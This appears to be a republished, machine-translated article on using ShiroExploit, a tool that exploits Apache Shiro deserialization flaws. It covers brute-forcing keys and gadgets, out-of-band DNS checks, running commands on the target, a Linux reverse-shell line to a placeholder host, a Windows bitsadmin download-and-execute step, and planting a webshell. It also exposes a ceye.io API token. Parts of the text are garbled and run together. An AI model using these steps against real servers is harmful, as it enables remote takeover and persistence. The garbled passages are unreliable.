Shulou(Shulou.com)06/01 Report--

This article mainly explains "how to use Shiro vulnerability detection tool ShiroExploit". Interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Now let the editor take you to learn how to use the Shiro vulnerability detection tool ShiroExploit.

ShiroExploit

Support for one-click detection of Shiro550 (hard-coded key) and Shiro721 (Padding Oracle), and support simple echo.

Instructions for use the first step: enter the target URL to be detected and select the vulnerability type Shiro550 according to the requirements without providing rememberMe Cookie, Shiro721 needs to provide a valid rememberMe CookieShiro550 without selecting operating system type, Shiro721 needs to select operating system type can specify specific Key and Gadget manually, default is not specified, it will traverse all Key and Gadget complex Http requests to support direct pasting of packets

Step 2: choose the mode of attack

You can choose to use ceye.io for vulnerability detection without any configuration. The CEYE domain name and the corresponding Token have been preset in the configuration file, and of course you can modify them. The program will first use URLDNS to filter out the unique Key, and then call each Gadget in turn to generate Payload disadvantages: the program will use API: http://api.ceye.io/v1/records?token=a78a1cb49d91fe09e01876078d1868b2&type=dns&filter=[UUID] to query the test results, and sometimes the API can not be accessed properly, resulting in unable to find Key in this way or a valid Gadget that chooses to use dnslog.cn for vulnerability detection without any configuration. The program automatically applies for a DNS Record from dnslog.cn each time it starts. The program will first use URLDNS to filter out a unique Key, and then call each Gadget in turn to generate Payload disadvantages: in a few cases, the dnslog.cn will show the DNS parsing result for a long time, so that the program cannot find the Key or valid Gadget. And dnslog.cn will only record the last 10 DNS resolution records. If you choose to use JRMP + dnslog for vulnerability detection, you need to open HttpService/JRMPListener on VPS by java-cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port], and fill in the corresponding IP and port as required. If the port number is not specified when opening HttpService/JRMPListener, HTTPService listens to port 8080 by default, and JRMPListener listens to port 8088 by default to detect vulnerabilities by using JRMP. Can significantly reduce the cookie Big Mini Program will first use URLDNS to filter out a unique Key, and then use JRMP to generate the corresponding JRMPListener for each Gadget in turn to choose to use echo for vulnerability detection for vulnerability detection in the case of not leaving the network. At this time, the number of Gadget types that can be detected is less than that of Gadget types using DNSLog. At present, echo is mainly achieved by writing the result of command execution to the Web directory and then reading it. You need to provide a static resource URL, and the program will write to the directory where the static resource is located. Note: at the beginning, echo is implemented using the method introduced by https://blog.csdn.net/fnmsd/article/details/106709736, which can be tested successfully locally. However, it is basically unsuccessful in the actual environment (there may be something wrong with my posture, welcome to discuss), so at present, the echo is achieved by reading and writing files. At a later stage, other ways may be added to the third step: detect vulnerabilities and execute command programs to determine whether there are vulnerabilities in the target application, the input box at the top of the window cannot be entered. When the program detects a loophole in the target application, the input box can enter and execute the command. Bounce shell (linux) bounce bash-I > & / dev/tcp/1.2.3.4/443 0 > & 1 bounce shell bounce shell (Windows) use bitsadmin to download the exe file of the specified URL and execute it to get shell

When you get Webshell, you can write webshell directly under the path given by the user (the directory needs to exist). The webshell name and suffix name are specified by the user, and the contents of webshell are read from the shell.jsp under the config directory.

Note: when using the vulnerability detection main program or opening HttpService/JRMPListener, you need the support of ysoserial.jar. You can put ysoserial.jar and ShiroExploit.jar in the same directory. At this point, I believe you have a deeper understanding of "how to use the Shiro vulnerability detection tool ShiroExploit". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.